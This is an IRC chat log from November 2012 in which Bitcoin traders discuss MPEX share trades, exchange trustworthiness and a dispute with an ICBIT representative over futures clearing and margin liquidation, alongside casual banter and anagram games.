hour high: 11.80000, 24 hour vwap: 11.49471 Nov 17 02:15:04 I'll msg you Nov 17 02:15:11 get back to me when you are around Nov 17 02:15:56 here Nov 17 02:16:03 thestringpuller: ^ Nov 17 02:16:09 Check pm Nov 17 02:16:52 [MPEX] [S.MPOE] 22750 @ 0.00050144 = 11.4078 BTC [+] Nov 17 02:26:22 [MPEX] [S.MPOE] 15551 @ 0.00050144 = 7.7979 BTC [+] Nov 17 02:26:24 [MPEX] [S.MPOE] 2449 @ 0.00050147 = 1.2281 BTC [+] Nov 17 02:32:55 mircea_popescu: we both know no one is getting another cent, especially not one clawed back from me Nov 17 02:33:40 That sort of thing happens in the real world, not bitcoinland Nov 17 02:33:53 personally, i'm looking forward to youtube vids with patrick homeless under a bridge in a few years. Nov 17 02:35:38 [MPEX] [S.MPOE] 17200 @ 0.00050147 = 8.6253 BTC [+] Nov 17 02:35:57 I hope the same of nefario Nov 17 02:36:25 that;s a foregone point, it's how he lives anyway. Nov 17 02:36:51 thestringpuller: how many, what strike? Nov 17 02:37:01 oh Nov 17 02:37:24 Well, I know nothing of his living conditions, just that I want them to deteriorate Nov 17 02:37:43 i'll settle for "not improve". Nov 17 02:44:31 thestringpuller, can i be of some disservice, too? Nov 17 02:44:53 [MPEX] [S.MPOE] 700 @ 0.00050147 = 0.351 BTC [+] Nov 17 02:44:53 if not, i'm gonna sleep Nov 17 02:44:53 [MPEX] [S.MPOE] 2651 @ 0.00050147 = 1.3294 BTC [+] Nov 17 02:44:54 [MPEX] [S.MPOE] 25542 @ 0.0005015 = 12.8093 BTC [+] Nov 17 02:45:14 jurov: i think he's afk currently Nov 17 02:45:24 ahh gotta love capitalism Nov 17 02:45:27 NO SLEEP FOR YOU Nov 17 02:46:03 jurov: if mircea_popescu at keyboard, we prolly don't need you for what we talked about earlier Nov 17 02:46:06 ha. i'll start mpex brokers' union Nov 17 02:46:36 lol where's pinkerton Nov 17 02:46:59 https://bitcointalk.org/index.php?topic=125376.msg1340175#msg1340175 someone should point out to garzik that he's making a fool of himself. Nov 17 02:47:26 I'm using coinbr as my mpoe portfolio for now Nov 17 02:47:37 I'm waiting for it go up Nov 17 02:47:45 exponentially Nov 17 02:47:48 after the end of the world Nov 17 02:47:53 !ticker s.mpoe Nov 17 02:47:55 [MPEX:S.MPOE] 1day: 0.00048619 / 0.00049456 / 0.0005015 (4558726 shares, 2,254.59 BTC), 30day: 0.00041724 / 0.00047429 / 0.00051331 (63096616 shares, 29,926.13 BTC) Nov 17 02:48:09 under 5 huh Nov 17 02:48:11 WHY!! Nov 17 02:48:18 no way Nov 17 02:48:22 last trade was at 5 Nov 17 02:48:45 current ask: .00050150 Nov 17 02:48:50 yes, today's development was very intresting Nov 17 02:49:35 not really, I think I understand what is going on Nov 17 02:49:43 do tell Nov 17 02:49:54 Someone liquidated early holdings of mpoe that last couple of days as it is gaining value Nov 17 02:50:14 it's true some people got it as cheap as 9k satoshi Nov 17 02:50:58 *cough* copumpkin *cough* Nov 17 02:51:01 yea but that was yesterday. today completely different things happened Nov 17 02:51:12 it's going to continue growing in the long term Nov 17 02:51:19 it HAS to Nov 17 02:51:43 It's like people who invested in btc 1 year to today Nov 17 02:51:56 so... I'm thinking that my icbit account is locked Nov 17 02:52:52 i told ya.. sell it while you can Nov 17 02:54:16 everyone should listen to jurov Nov 17 02:54:20 he is a good broker Nov 17 02:54:21 [MPEX] [S.MPOE] 15858 @ 0.0005015 = 7.9528 BTC [+] Nov 17 02:54:22 [MPEX] [S.MPOE] 11873 @ 0.0005015 = 5.9543 BTC [+] Nov 17 02:54:23 [MPEX] [S.MPOE] 26685 @ 0.00050154 = 13.3836 BTC [+] Nov 17 02:55:04 oh my Nov 17 02:55:45 let's talk more of it Nov 17 02:55:49 maybe we can see 6 Nov 17 02:56:15 when i succeed to return all these loans and have more stuff than i began with, then we can talk about me being a broker Nov 17 02:56:37 We will see 6 Nov 17 02:56:41 maybe by end of the year Nov 17 02:56:51 historically mpoe makes money so why shouldn't shareholders be confident? Nov 17 02:57:04 indeed. Nov 17 02:57:17 there's not that many actual ways to make money that are in btc. Nov 17 03:01:11 thus doesn't that make MPOE one of the rare institutions that makes btc besides say, miners, or like bitinstant? Nov 17 03:03:36 [MPEX] [S.MPOE] 25893 @ 0.00050154 = 12.9864 BTC [+] Nov 17 03:03:38 [MPEX] [S.MPOE] 1081 @ 0.00050158 = 0.5422 BTC [+] Nov 17 03:04:52 kinda. Nov 17 03:04:55 or satoshidice Nov 17 03:05:19 there's a few businesses and business models that actually make btc revenue. Nov 17 03:05:22 not so many of them Nov 17 03:08:01 let's make us a new channel: #bitcoin-circlejerk Nov 17 03:09:24 loool it exists.. and guess who is op Nov 17 03:10:26 um... Nov 17 03:10:41 imsaguy Nov 17 03:11:14 no. rawrmage Nov 17 03:11:34 sounds abrought right. Nov 17 03:11:51 i mean, abrout Nov 17 03:12:56 [MPEX] [S.MPOE] 12419 @ 0.00050158 = 6.2291 BTC [+] Nov 17 03:12:58 [MPEX] [S.MPOE] 1624 @ 0.00050159 = 0.8146 BTC [+] Nov 17 03:14:15 'night. Nov 17 03:15:10 later Nov 17 03:16:38 so it begins Nov 17 03:16:42 congratulations Nov 17 03:16:47 lol Nov 17 03:22:11 [MPEX] [S.MPOE] 35801 @ 0.00050159 = 17.9574 BTC [+] Nov 17 03:31:48 [MPEX] [S.MPOE] 14900 @ 0.00050159 = 7.4737 BTC [+] Nov 17 03:34:21 "Of all the offspring of Time, Error is the most ancient, and is so old and familiar an acquaintance, that Truth, when discovered, comes upon most of us like an intruder, and meets the intruder's welcome." Nov 17 03:34:26 that's good. Nov 17 03:34:56 very quoteable Nov 17 03:37:33 mircea_popescu: researching tulip futures contracts ? Nov 17 03:38:25 just re-visiting the popular delusions and madness of crowds book Nov 17 03:40:55 [MPEX] [S.MPOE] 21214 @ 0.00050159 = 10.6407 BTC [+] Nov 17 03:40:56 [MPEX] [S.MPOE] 27032 @ 0.00050161 = 13.5595 BTC [+] Nov 17 03:44:07 BTC-Mining ph got the tag, did you see ? Nov 17 03:47:39 yup Nov 17 03:47:53 Not for your thing tho I believe... Nov 17 03:50:19 [MPEX] [S.MPOE] 5768 @ 0.00050161 = 2.8933 BTC [+] Nov 17 03:50:20 [MPEX] [S.MPOE] 27250 @ 0.00050164 = 13.6697 BTC [+] Nov 17 03:50:21 [MPEX] [S.MPOE] 10082 @ 0.00050166 = 5.0577 BTC [+] Nov 17 03:54:32 haha rly ? Nov 17 04:00:25 [MPEX] [S.MPOE] 10000 @ 0.00050166 = 5.0166 BTC [+] Nov 17 04:09:31 [MPEX] [S.MPOE] 31637 @ 0.00050166 = 15.871 BTC [+] Nov 17 04:15:11 suddenly we comprehend why trade receipts are suck fucking important pieces of info Nov 17 04:15:17 suck = such Nov 17 04:16:02 mircea_popescu: no, because if you give receipts, you can't scam the suckers ;) Nov 17 04:16:23 heh. myea. Nov 17 04:16:50 mircea_popescu: ever consider making it to where you use m of n txns instead of holding btc? Nov 17 04:17:00 all the while, inaba is explaining why the nebulous conflartion of gpg, wot and everything else in his head is "marginal" Nov 17 04:17:01 (for mpex) Nov 17 04:17:26 i;ve considered it, but it seems like a lot of trouble for very dubious benefits. Nov 17 04:17:53 the main disadvantage is that a scheme like that makes all transactions traceable. Nov 17 04:18:42 [MPEX] [S.MPOE] 16363 @ 0.00050166 = 8.2087 BTC [+] Nov 17 04:18:43 [MPEX] [S.MPOE] 22637 @ 0.00050166 = 11.3561 BTC [+] Nov 17 04:18:51 dubious? wouldn't it lower the desireability to attack the exchange, lower your liabilty (risk) and increase the exchange's trustworthyness? Nov 17 04:19:01 although, it's still a lot of work Nov 17 04:19:02 well, let's see : Nov 17 04:19:21 i doubt the exchange's trustworthyness can ever exceed mine. in this sense it would increase it from 100% to 100%, so it's a moot point. Nov 17 04:19:46 the problem of tracing is essential tho. currently money going in/out of mpex is not associable with any user Nov 17 04:19:58 in the m/n scheme money could be followed through the actual transactions, exposing everyone. Nov 17 04:20:05 ah Nov 17 04:20:33 i can see the argument for using that model anyway, but it would be a catastrophic departure from the current model, so nothing i'd entertain lightly. Nov 17 04:21:12 in other news, php takes a long ass time to install Nov 17 04:21:20 other points are that the complexity of implementation might perversely make the exchange more attack-worthy (as in, more code that could maybe be fucked up ?) Nov 17 04:21:27 make everything slower and so forth Nov 17 04:21:47 ... if you are updating linux headers, gcc, and 30 other dependancies too... Nov 17 04:21:56 ... compiling them all from source ... Nov 17 04:22:10 well what's the rush. Nov 17 04:22:37 no rush really Nov 17 04:27:05 ;;ticker Nov 17 04:27:06 BTCUSD ticker | Best bid: 11.68000, Best ask: 11.68979, Bid-ask spread: 0.00979, Last trade: 11.68001, 24 hour volume: 56976.73757283, 24 hour low: 11.17500, 24 hour high: 11.80000, 24 hour vwap: 11.51821 Nov 17 04:27:26 settled over 11.5 huh Nov 17 04:27:54 [MPEX] [S.MPOE] 5718 @ 0.00050166 = 2.8685 BTC [+] Nov 17 04:27:55 [MPEX] [S.MPOE] 10300 @ 0.00050166 = 5.1671 BTC [+] Nov 17 04:27:57 [MPEX] [S.MPOE] 1963 @ 0.00050166 = 0.9848 BTC [+] Nov 17 04:27:58 [MPEX] [S.MPOE] 8506 @ 0.0005017 = 4.2675 BTC [+] Nov 17 04:29:25 have there been any [-]s today at all ?! Nov 17 04:31:11 [MPEX] [S.DICE] 140 @ 0.00339942 = 0.4759 BTC [+] Nov 17 04:31:13 [MPEX] [S.DICE] 460 @ 0.00339944 = 1.5637 BTC [+] Nov 17 04:37:46 lol Nov 17 04:40:32 [MPEX] [S.MPOE] 10563 @ 0.0005017 = 5.2995 BTC [+] Nov 17 04:45:34 lord msickles! Nov 17 04:45:56 You may approach, my subject. Nov 17 04:46:43 http://rt.com/news/austerity-protests-eu-solidarity-727/ << 'We have no future!' EU anger unites millions in protest Nov 17 04:46:52 welll... if only they figured out bitcoinz Nov 17 04:47:30 thestringpuller: if your are going to mix upthe order of the letters in my name, try for slicks me Nov 17 04:47:35 or sick elms Nov 17 04:47:50 or lick mess Nov 17 04:47:52 i'm sshe'd in through a web browser Nov 17 04:47:53 that's a good one Nov 17 04:47:56 XD Nov 17 04:48:07 secs milk? Nov 17 04:48:12 kim el scs Nov 17 04:49:20 A Epicures Comp Nov 17 04:49:44 Campier Coupes Nov 17 04:49:45 Campier Coupes Nov 17 04:50:10 [MPEX] [S.MPOE] 19981 @ 0.0005017 = 10.0245 BTC [+] Nov 17 04:50:12 [MPEX] [S.MPOE] 4219 @ 0.00050185 = 2.1173 BTC [+] Nov 17 04:50:34 um, copier capes? Nov 17 04:51:00 lol Nov 17 04:53:02 oh but thestringpuller wins Nov 17 04:53:27 regentship trull Nov 17 04:53:30 repelling thrust Nov 17 04:53:38 preselling truth Nov 17 04:53:46 pretelling hurts Nov 17 04:54:16 pretells, unright Nov 17 04:55:02 thru lips gentler Nov 17 04:55:04 ^^ Nov 17 04:59:37 [MPEX] [S.MPOE] 35181 @ 0.00050185 = 17.6556 BTC [+] Nov 17 04:59:38 [MPEX] [S.MPOE] 2719 @ 0.00050199 = 1.3649 BTC [+] Nov 17 05:05:13 presseling truth ?! pretty good! Nov 17 05:08:28 anagrams Nov 17 05:08:40 ram nagas Nov 17 05:08:47 [MPEX] [S.MPOE] 24481 @ 0.00050199 = 12.2892 BTC [+] Nov 17 05:08:48 [MPEX] [S.MPOE] 9319 @ 0.00050204 = 4.6785 BTC [+] Nov 17 05:09:10 :| Nov 17 05:11:56 smickles we will do put at 12 Nov 17 05:14:57 [MPEX] [S.MPOE] 28800 @ 0.00050204 = 14.4588 BTC [+] Nov 17 05:15:02 [MPEX] [S.MPOE] 3581 @ 0.00050204 = 1.7978 BTC [+] Nov 17 05:15:03 [MPEX] [S.MPOE] 23300 @ 0.00050206 = 11.698 BTC [+] Nov 17 05:15:05 [MPEX] [S.MPOE] 4819 @ 0.00050218 = 2.42 BTC [+] Nov 17 05:15:56 [MPEX] [S.MPOE] 21466 @ 0.00050218 = 10.7798 BTC [+] Nov 17 05:16:29 [MPEX] [S.MPOE] 25965 @ 0.00050218 = 13.0391 BTC [+] Nov 17 05:16:31 [MPEX] [S.MPOE] 7435 @ 0.00050223 = 3.7341 BTC [+] Nov 17 05:16:46 [MPEX] [S.MPOE] 12615 @ 0.00050223 = 6.3356 BTC [+] Nov 17 05:16:48 [MPEX] [S.MPOE] 5485 @ 0.00050235 = 2.7554 BTC [+] Nov 17 05:16:52 [MPEX] [S.MPOE] 17515 @ 0.00050235 = 8.7987 BTC [+] Nov 17 05:16:53 [MPEX] [S.MPOE] 11890 @ 0.00050304 = 5.9811 BTC [+] Nov 17 05:16:54 [MPEX] [S.MPOE] 18612 @ 0.00050317 = 9.365 BTC [+] Nov 17 05:17:03 [MPEX] [S.MPOE] 17538 @ 0.00050317 = 8.8246 BTC [+] Nov 17 05:17:04 [MPEX] [S.MPOE] 23184 @ 0.00050335 = 11.6697 BTC [+] Nov 17 05:17:05 [MPEX] [S.MPOE] 10750 @ 0.00050359 = 5.4136 BTC [+] Nov 17 05:17:06 [MPEX] [S.MPOE] 6549 @ 0.00050366 = 3.2985 BTC [+] Nov 17 05:17:12 thestringpuller: you mean we'll do a put when mtgox gets to 12? Nov 17 05:17:20 [MPEX] [S.MPOE] 4951 @ 0.00050366 = 2.4936 BTC [+] Nov 17 05:17:21 [MPEX] [S.MPOE] 11850 @ 0.00050369 = 5.9687 BTC [+] Nov 17 05:17:22 [MPEX] [S.MPOE] 5449 @ 0.00050369 = 2.7446 BTC [+] Nov 17 05:17:44 [MPEX] [S.MPOE] 11422 @ 0.00050369 = 5.7531 BTC [+] Nov 17 05:17:50 [MPEX] [S.MPOE] 11279 @ 0.00050369 = 5.6811 BTC [+] Nov 17 05:17:51 [MPEX] [S.MPOE] 16800 @ 0.00050373 = 8.4627 BTC [+] Nov 17 05:17:53 [MPEX] [S.MPOE] 5821 @ 0.00050375 = 2.9323 BTC [+] Nov 17 05:18:00 [MPEX] [S.MPOE] 28550 @ 0.00050375 = 14.3821 BTC [+] Nov 17 05:18:46 [MPEX] [S.MPOE] 13105 @ 0.00050375 = 6.6016 BTC [+] Nov 17 05:24:06 that may take a while, seems it's retracing Nov 17 05:31:17 [MPEX] [S.MPOE] 9778 @ 0.00050012 = 4.8902 BTC [-] Nov 17 05:31:52 [MPEX] [S.MPOE] 12607 @ 0.00049986 = 6.3017 BTC [-] Nov 17 05:31:53 [MPEX] [S.MPOE] 16321 @ 0.00049967 = 8.1551 BTC [-] Nov 17 05:32:38 [MPEX] [S.MPOE] 8000 @ 0.0004982 = 3.9856 BTC [-] Nov 17 05:32:47 [MPEX] [S.MPOE] 20741 @ 0.0004982 = 10.3332 BTC [-] Nov 17 05:33:04 [MPEX] [S.MPOE] 4559 @ 0.00049819 = 2.2712 BTC [-] Nov 17 05:33:06 [MPEX] [S.MPOE] 19450 @ 0.00049854 = 9.6966 BTC [+] Nov 17 05:33:58 [MPEX] [S.MPOE] 9792 @ 0.00049961 = 4.8922 BTC [+] Nov 17 05:34:00 [MPEX] [S.MPOE] 9300 @ 0.00049963 = 4.6466 BTC [+] Nov 17 05:34:01 [MPEX] [S.MPOE] 4358 @ 0.0004997 = 2.1777 BTC [+] Nov 17 05:34:12 [MPEX] [S.MPOE] 37942 @ 0.0004997 = 18.9596 BTC [+] Nov 17 05:34:14 [MPEX] [S.MPOE] 2608 @ 0.00049973 = 1.3033 BTC [+] Nov 17 05:35:28 [MPEX] [S.MPOE] 27242 @ 0.00049973 = 13.6136 BTC [+] Nov 17 05:35:29 [MPEX] [S.MPOE] 6050 @ 0.00049978 = 3.0237 BTC [+] Nov 17 05:35:42 [MPEX] [S.MPOE] 16930 @ 0.00049994 = 8.464 BTC [+] Nov 17 05:35:59 [MPEX] [S.MPOE] 13078 @ 0.00049979 = 6.5363 BTC [-] Nov 17 05:50:11 [MPEX] [S.MPOE] 14970 @ 0.00049994 = 7.4841 BTC [+] Nov 17 05:50:12 [MPEX] [S.MPOE] 28230 @ 0.00050012 = 14.1184 BTC [+] Nov 17 05:56:53 "( ) Enable keyboard shortcuts?" << hell yeah enable keyboard shortcuts! Why isn't that checked by default? Nov 17 06:02:27 nighty all! **** BEGIN LOGGING AT Sat Nov 17 12:54:51 2012 Nov 17 12:56:46 http://blog.smickles.com haha smickles has a blog ? Nov 17 13:38:24 soo, what's new ? Nov 17 13:42:08 hostess shut down like i said they would Nov 17 13:42:14 kickass. Nov 17 13:42:17 in yo face wonderbread. Nov 17 13:42:24 lol Nov 17 13:43:15 also petraus bs.. looks like he new it was a terrorst attack and he got kicked out cuz he was fail, not cuz sleeping around Nov 17 13:52:25 o ? link ? Nov 17 13:53:42 i saw it on my phone Nov 17 13:53:48 he is testifiying before congress Nov 17 13:53:59 aha Nov 17 13:54:20 someone maybe the white house... edited some of the report, cuz election Nov 17 13:56:12 http://www.bbc.co.uk/news/world-us-canada-20362941 Nov 17 13:56:18 related Nov 17 14:11:04 jurov, would it be possible to change the timeframe of the chart here http://live.coinbr.com/?mpsic=S.MPOE Nov 17 14:11:11 on teh fly perhaps Nov 17 14:11:28 you mean, longer time? Nov 17 14:11:34 a slider bar! Nov 17 14:12:14 in other news, i'm curious if inaba has an aneurism Nov 17 14:12:15 https://bitcointalk.org/index.php?topic=124441.msg1340625#msg1340625 Nov 17 14:12:16 or a depth? Nov 17 14:12:31 no current depth is ok i guess Nov 17 14:12:39 just the trades line is quite 'short' Nov 17 14:12:42 no? Nov 17 14:13:01 like for example id like to see last 30d or so Nov 17 14:13:24 in fact yes, i planned to do it someday Nov 17 14:14:24 maybe just a 1 day 7 day 30 day 365 day set of buttons Nov 17 14:15:05 it's just that currently i have to do other jobs :/ Nov 17 14:15:14 if anyone cared to toss some btc in for charts improvement, it woould be sooner ;) Nov 17 14:15:40 course now looking at it, i don't understand the depth Nov 17 14:15:55 why does it look like a - and then | ? Nov 17 14:16:00 actual depth seems to be more like \ Nov 17 14:17:10 no nm, you're right, there are cliffs around 48 and 52 Nov 17 14:17:10 brb lunch Nov 17 14:17:11 mircea, not sure if you're trolling.. which depth is wrong? bid? ask? Nov 17 14:17:22 nm nm i was confused. Nov 17 14:17:31 okay :P Nov 17 14:18:40 hm.. i'll put donation addy there and we'll see Nov 17 14:19:11 1CoinBr662GWdiqVz8mXJUnYjWZbBchKAb Nov 17 14:19:13 omg why is nobody writing for my contest! Nov 17 14:19:32 is bitcoin bereft of literary talent! are you all stifs! Nov 17 14:19:52 and the cherry truck is actually used anywhere? Nov 17 14:20:52 in the cherry thread so far. Nov 17 14:21:15 it did deliver it's weight in lulz tho, did you see that croppo guy go ? Nov 17 14:22:26 seems i kinda missed that thread Nov 17 14:33:04 ;;google scammer tag Nov 17 14:33:05 Scammer tag: PatrickHarnett: ; SR Scammer Tag Appeals | SteamRep Forums: ; Tag: scam - Better Business Bureau Consumer Alert: Nov 17 14:33:13 first one Nov 17 14:34:25 [MPEX] [S.MPOE] 11900 @ 0.00050042 = 5.955 BTC [+] Nov 17 14:34:26 [MPEX] [S.MPOE] 26869 @ 0.00050044 = 13.4463 BTC [+] Nov 17 15:05:42 it took me till now to actually read until the picture :/ Nov 17 15:06:00 and i should be doing something completely different Nov 17 15:08:25 lol sorry. Nov 17 15:08:35 ;;google "and now for something completely different" Nov 17 15:08:36 And Now for Something Completely Different - Wikipedia, the free ...: ; And Now for Something Completely Different (1971) - IMDb: ; And now for something completely different - YouTube: Nov 17 15:18:57 " just like MPEx demolished GLBSE. " Nov 17 15:19:06 im pretty sure nefario did that all by himself... Nov 17 15:20:36 oh, inaba says the same... Nov 17 16:19:56 mpex demolished glbse by not failing :) Nov 17 16:20:00 its good. Nov 17 16:21:04 [MPEX] [S.MPOE] 29981 @ 0.00050044 = 15.0037 BTC [+] Nov 17 16:21:06 [MPEX] [S.MPOE] 2368 @ 0.00050049 = 1.1852 BTC [+] Nov 17 17:15:52 http://trilema.com/2012/wikocrisy/ << in which i'm pissed @wikipedia Nov 17 17:23:41 hehe Nov 17 17:24:00 stereotypes are hard to beat Nov 17 17:26:52 what's hard to beat is intellectual indolence Nov 17 17:27:03 inaba sitting around explaining how he doesn't have to learn to use the wot Nov 17 17:27:05 that sorta thing Nov 17 17:30:15 little revenge: http://www.encyclopediabitcoinica.com/wiki/Wikipedia ;) Nov 17 17:30:49 well inaba is a puppet with a huge army of stupid followers Nov 17 17:31:14 kakobrekla yeah, bfl pays forum ppl to put them in the signature. i pay forum ppl to put "fuck you sec" in their signature. Nov 17 17:31:21 apparently the difference is lost on most of the population. Nov 17 17:31:41 lol go get em jurov :D Nov 17 17:34:55 bucharest is LA minus fresh air? that means in bucharest there's fresher air or vice versa? Nov 17 17:35:21 (was never in either) Nov 17 17:36:50 la is famous for being a polluted hellhole Nov 17 17:37:13 stylistically this implies that compared to bucharest, la has fresh air going for it. Nov 17 17:38:09 then i'd say it's LA plus fresh air... but let's see what english natives say Nov 17 17:38:30 if there are any around Nov 17 17:39:10 and yes, i heard rumors about bay area smog, too Nov 17 17:39:34 if it's la plus fresh air then that'd mean bucharest has fresh air. quite the contrary Nov 17 17:40:04 if anyone is into judicialspotting : www.judicialhellholes.org%2Fwp-content%2Fuploads%2F2011%2F12%2FJudicial-Hellholes-2011.pdf Nov 17 17:41:54 bah, that's just 'merica Nov 17 17:42:05 well yea. Nov 17 17:42:07 i looked forward to seeing slovakia there Nov 17 17:45:16 we don't even have Attorney General for like, more than a year.. cause president just refused to appoint the elected one, for basically "no reason". Nov 17 17:46:04 [MPEX] [S.MPOE] 33200 @ 0.00050049 = 16.6163 BTC [+] Nov 17 17:49:40 so ? Nov 17 18:10:46 so? just a mess, generally Nov 17 18:33:49 "LOL... you are laughable man. Good luck with your business ventures, it's clear you have exactly zero connection with business reality!" Nov 17 18:34:12 inaba recovered from aneurysm.. with some lasting damage, tho Nov 17 18:59:31 lol ok Nov 17 19:02:22 smickles https://bitcointalk.org/index.php?topic=50817.msg1341151#msg1341151 Nov 17 19:02:26 did you get a response >? Nov 17 19:03:01 and also... wait for it... Nov 17 19:03:02 http://blog.foreignpolicy.com/posts/2012/11/16/taliban_accidentally_ccs_everybody_on_its_mailing_list Nov 17 19:07:18 wzz new? Nov 17 19:09:54 lol at the taliban news Nov 17 19:10:07 where can I get the ailing list? Nov 17 19:10:14 mailing* Nov 17 19:17:34 twitter lol Nov 17 19:22:43 twitter? eek. isn’ Nov 17 19:22:54 isnt' that the one terrorists use? Nov 17 19:23:01 twitter? that shit sucks Nov 17 19:24:13 twitter is sorta like lj for the add crowd Nov 17 19:24:16 I want the full list, not some shitty 140 char. messages Nov 17 19:24:29 lj? Nov 17 19:25:54 livejournal Nov 17 19:26:09 "add crowd" ? Nov 17 19:26:14 ;;google ADD Nov 17 19:26:15 Attention Deficit Disorder Association: ; ADD and ADHD Center: Symptoms, Types, Causes, Tests, and ...: ; Attention deficit disorder - Wikipedia, the free encyclopedia: Nov 17 19:26:18 oh Nov 17 19:26:20 :p Nov 17 19:26:36 yeah, my boyfriend has that... he uses tumblr though not twitter lol Nov 17 19:26:53 haha tumblr is like wp for the add crowd Nov 17 19:27:45 interesting... 3.7-rc6 today, but still no 3.6.7 Nov 17 19:28:03 I guess linus torvolds REALLY wants to put everything on hold until 3.7.x is out Nov 17 19:28:31 torvalds works on like one thing Nov 17 19:28:54 thestringpuller: yeah. criticizing people's work and blocking new features. Nov 17 19:28:58 does he even care about merge requests anymore? Nov 17 19:29:00 it's like torvold's main thing. Nov 17 19:29:58 kuzetsa in truth tho, after a product matures, guarding against feature creep is the main responsibility of the maintainer. Nov 17 19:30:54 tell me about da revolution! Nov 17 19:31:07 will it be televised? Nov 17 19:31:26 !ticker S.MPOE Nov 17 19:31:28 [MPEX:S.MPOE] 1day: 0.00049638 / 0.00050017 / 0.00050375 (2812055 shares, 1,406.53 BTC), 30day: 0.0004278 / 0.00047652 / 0.00051331 (62500950 shares, 29,783.02 BTC) Nov 17 19:33:12 mircea_popescu: fair enough. Nov 17 19:33:19 apparently the egyptians are about to invade israel Nov 17 19:33:21 like... tonight Nov 17 19:33:35 [MPEX] [S.MPOE] 44866 @ 0.00050024 = 22.4438 BTC [-] Nov 17 19:33:39 yea world war 3 Nov 17 19:33:56 middle east is so annoying now Nov 17 19:34:13 it is why we cant have nice things Nov 17 19:34:52 hah Nov 17 19:35:01 we should invent a weed smoke bomb Nov 17 19:35:07 and get dem all supah high Nov 17 19:36:28 ive never heard a story about someone getting high, going home and beating their wife Nov 17 19:37:13 imma gonna do it just to prove you wrong. Nov 17 19:37:42 you have to get supah high first Nov 17 19:37:52 like think cheech and chong is funny high Nov 17 19:37:55 kakobrekla didn't know you were married Nov 17 19:37:58 then try and beat your wife Nov 17 19:38:05 you wont be able to do it Nov 17 19:38:07 mircea_popescu, that can be done instantly while i smoke. Nov 17 19:38:15 <_Fireball> hey mircea_popescu Nov 17 19:38:22 maybe beat someone else's wife. Nov 17 19:38:23 yes ? Nov 17 19:38:24 <_Fireball> I'm here, if you have questions Nov 17 19:38:27 she'll make you food and youll love her Nov 17 19:38:30 well that can work too. Nov 17 19:38:39 a, welcome to the pit. so what exactly is the story with icbit ? Nov 17 19:39:11 <_Fireball> I read your report, and I think you judged your conclusions of the fact that the futures contract position is closed each day after clearing Nov 17 19:39:27 <_Fireball> it's not closed, and it was not forcefully closed yesterday too, even considering the massive sell off Nov 17 19:39:27 ;;seen smickles Nov 17 19:39:27 smickles was last seen in #bitcoin-assets 7 hours, 42 minutes, and 3 seconds ago: er Nov 17 19:39:41 the point of most concern is smickles' report that he could not place bids Nov 17 19:39:47 during the half minute or so towards the end. Nov 17 19:39:49 <_Fireball> clearing is just to transfer variation margin Nov 17 19:39:56 this partial closing of the book is very problematic. Nov 17 19:40:13 <_Fireball> mircea_popescu, - I warned that to prevent manipulation we are delaying clearing for half an hour and will perform some maintenance during that time Nov 17 19:40:23 when, this ? Nov 17 19:40:29 <_Fireball> just a moment Nov 17 19:41:27 no rush. Nov 17 19:41:36 <_Fireball> https://bitcointalk.org/index.php?topic=50817.msg1339650#msg1339650 and https://twitter.com/icbit_se Nov 17 19:42:26 November 16, 2012, 07:59:31 PM Nov 17 19:42:48 <_Fireball> yep Nov 17 19:42:50 the event we are discussing is Nov 17 19:42:50 15NOV12 19:59 At 30 seconds until close, I saw the expected sell order. It was larger than I had expected, leaving about 450 contracts on the book at 10.025. Notwithstanding the fact that his order would not overcome this, I dutifully placed the order Mircea had asked me too. Nov 17 19:42:58 about a day or so before. Nov 17 19:43:38 <_Fireball> let me open up your blog post.. Nov 17 19:44:16 <_Fireball> ah, so you're talking about the day before. There were no scheduled maintenance back then, order entry was working as expected Nov 17 19:44:28 hrm, also, afaik bucket shop != dealing desk Nov 17 19:44:54 <_Fireball> I'm referring to the specific line in your blog post: Nov 17 19:44:56 <_Fireball> "At 22:00 20:00 UTC the site arbitrarily enforces an even lower price, wipes his margin, closes his contract and that’s that, random user was scammed out of his few BTC." Nov 17 19:45:08 <_Fireball> Contract is NOT closed at 20:00 UTC. Nov 17 19:45:37 um. so suppose someone buys 1000 contracts at 10, deposits enough margin for just this Nov 17 19:45:43 price at 20:00 is 5 Nov 17 19:45:49 is the position not closed ? Nov 17 19:46:45 <_Fireball> nope, variation margin is transferred, that guy experience loss, but he still has 1000 contracts at 5 Nov 17 19:47:01 <_Fireball> this goes on until there is enough money in the account Nov 17 19:47:14 but in the example i gave there would not be enough money in the account. Nov 17 19:47:46 let's work in more detail. usd/btc is 10.0. someone deposits 100 btc. with margin, buys 500 contracts at a price of 10 Nov 17 19:47:49 next settlement, price is 5. Nov 17 19:48:01 the 100 btc deposited are not enough, are the contracts closed or no ? Nov 17 19:48:21 <_Fireball> it can't be 5 because there is a trading range for every session, which is a measure to prevent such situation entirely Nov 17 19:48:37 <_Fireball> so profit/loss within a trading session is limited by the trading range Nov 17 19:48:42 that has little impact. yes, you only change it 10% a day. Nov 17 19:48:53 <_Fireball> otherwise manipulators could bring it down to 1 and crash the market Nov 17 19:48:56 but alright, even more complex example Nov 17 19:49:07 <_Fireball> was your position closed? Nov 17 19:49:12 monday someone deposits 100 btc, price is 10. they buy 5000 contracts (cause of 5x margin) Nov 17 19:49:15 tuesday price is 9 Nov 17 19:49:27 wed it's 8.1, and so it goes until it is 5 on sunday. Nov 17 19:49:56 whether my position was closed or not is besides the point. the part of the article you're discussing is refering the mechanics of the thing, not my own position. Nov 17 19:50:00 but no, it was not closed. Nov 17 19:50:54 <_Fireball> this position *could be* forcefully sold if and only if the balance (money in the account + profit/loss in the current trading session) is less than or equal to 75% of the total maintenance margin requirement for the open positions Nov 17 19:51:14 right. Nov 17 19:51:16 <_Fireball> so if the market is going down, the position would be gradually liquidated well before it reachs 5 on sunday Nov 17 19:51:29 but again, the point of most concern is that on the 15th the book was closed to some participants, but not others. Nov 17 19:51:37 <_Fireball> we are quite careful not to cause too much of a flash-crash effect, so this is a managed process Nov 17 19:51:42 this would naturally lead to an inference against your site. Nov 17 19:52:00 <_Fireball> why placing orders in the last minute btw? Nov 17 19:52:15 exactly to expose the scam ? why else ? Nov 17 19:52:16 <_Fireball> we don't *guarantee* that your ISP maintains perfect connection to the website Nov 17 19:52:20 it's not the isp. Nov 17 19:52:33 <_Fireball> pardon, what's the point to place orders before clearing? Nov 17 19:52:40 <_Fireball> a clearing doesn't do any magic really Nov 17 19:52:50 <_Fireball> it just transfers variation margin, nothing is lost during that Nov 17 19:53:08 <_Fireball> a typical limit order can be put in at any time Nov 17 19:53:34 yes, a typical limit order can be put in any time. Nov 17 19:53:44 but if one suspects that the sellout happening just before closing is not legitimate Nov 17 19:53:47 one wants to verify this. Nov 17 19:54:07 <_Fireball> if you 